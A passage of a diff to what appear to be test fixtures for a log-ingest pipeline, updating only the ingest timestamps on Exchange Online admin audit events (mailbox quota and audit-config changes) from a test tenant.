bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM 
(Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", 
@@ -4705,7 +4705,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853278600Z", + "ingested": "2021-12-14T14:49:28.056977053Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:17\",\"ExternalAccess\":true,\"Id\":\"2cbbd2bb-607e-49b1-c02c-08d7adfc0e1c\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM 
(Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -4775,7 +4775,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853283300Z", + "ingested": "2021-12-14T14:49:28.056977548Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:24\",\"ExternalAccess\":true,\"Id\":\"9edbf9fe-f844-401f-e9ec-08d7adfc1242\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Admin Audit Log Settings\",\"Operation\":\"Set-AdminAuditLogConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"IgnoreDehydratedFlag\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"},{\"Name\":\"AdminAuditLogEnabled\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", 
@@ -4843,7 +4843,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853288300Z", + "ingested": "2021-12-14T14:49:28.056978058Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:34\",\"ExternalAccess\":true,\"Id\":\"0d7995da-038f-40d9-2765-08d7ac0f3d4d\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\OwaMailboxPolicy-Default\",\"Operation\":\"Set-OwaMailboxPolicy\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"InstantMessagingType\",\"Value\":\"Ocs\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\\\\OwaMailboxPolicy-Default\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", 
@@ -4926,7 +4926,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853293300Z", + "ingested": "2021-12-14T14:49:28.056978656Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:12\",\"ExternalAccess\":true,\"Id\":\"425128e3-4281-42f6-4ec7-08d7adfc0acd\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/Migration.8f3e7716-2011-43e4-96b1-aba62d229136\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"Management\",\"Value\":\"True\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"DisplayName\",\"Value\":\"Microsoft Exchange Migration\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"9 GB (9,663,676,416 bytes)\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"Migration\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/Migration.8f3e7716-2011-43e4-96b1-aba62d229136\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM 
(Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", 
@@ -5007,7 +5007,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853299500Z", + "ingested": "2021-12-14T14:49:28.056979116Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:14\",\"ExternalAccess\":true,\"Id\":\"6ddabbf8-4b7c-4982-2683-08d7adfc0c10\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM 
(Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", 
@@ -5088,7 +5088,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853303200Z", + "ingested": "2021-12-14T14:49:28.056979701Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:13\",\"ExternalAccess\":true,\"Id\":\"e6a88958-ff2a-4e9b-d681-08d7adfc0b73\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"DisplayName\",\"Value\":\"Microsoft Exchange\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"9 GB (9,663,676,416 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM 
(Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", 
@@ -5169,7 +5169,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853307100Z", + "ingested": "2021-12-14T14:49:28.056980172Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:02\",\"ExternalAccess\":true,\"Id\":\"f580aae6-d0d5-4204-1a13-08d7ac0f2a03\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM 
(Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", 
@@ -5250,7 +5250,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853310500Z", + "ingested": "2021-12-14T14:49:28.056980629Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:57\",\"ExternalAccess\":true,\"Id\":\"165a283d-6f9b-4dc2-1b86-08d7ac0f273c\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM 
(Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", 
@@ -5331,7 +5331,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853315Z", + "ingested": "2021-12-14T14:49:28.056981075Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:15\",\"ExternalAccess\":true,\"Id\":\"2db154f6-63ae-4a31-c548-08d7adfc0d1d\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM 
(Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", 
@@ -5412,7 +5412,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853320700Z", + "ingested": "2021-12-14T14:49:28.056981553Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:21\",\"ExternalAccess\":true,\"Id\":\"a61cdc9a-89ef-402b-102c-08d7ac0f3592\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM 
(Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", 
@@ -5493,7 +5493,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853325700Z", + "ingested": "2021-12-14T14:49:28.056982012Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:17\",\"ExternalAccess\":true,\"Id\":\"2202ec45-7abc-49dd-e35e-08d7adfc0e15\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM 
(Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -5562,7 +5562,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853332600Z", + "ingested": "2021-12-14T14:49:28.056982446Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:04\",\"ExternalAccess\":true,\"Id\":\"a0063917-bb25-4c17-fe2e-08d7ac0f0769\",\"ObjectId\":\"testsiem.onmicrosoft.com\",\"Operation\":\"Enable-AddressListPaging\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DoNotUpdateRecipients\",\"Value\":\"True\"},{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", 
@@ -5632,7 +5632,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853338400Z", + "ingested": "2021-12-14T14:49:28.056982909Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:55\",\"ExternalAccess\":true,\"Id\":\"0caecd44-0161-44e5-0e45-08d7ac0f49d6\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Admin Audit Log Settings\",\"Operation\":\"Set-AdminAuditLogConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"IgnoreDehydratedFlag\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted 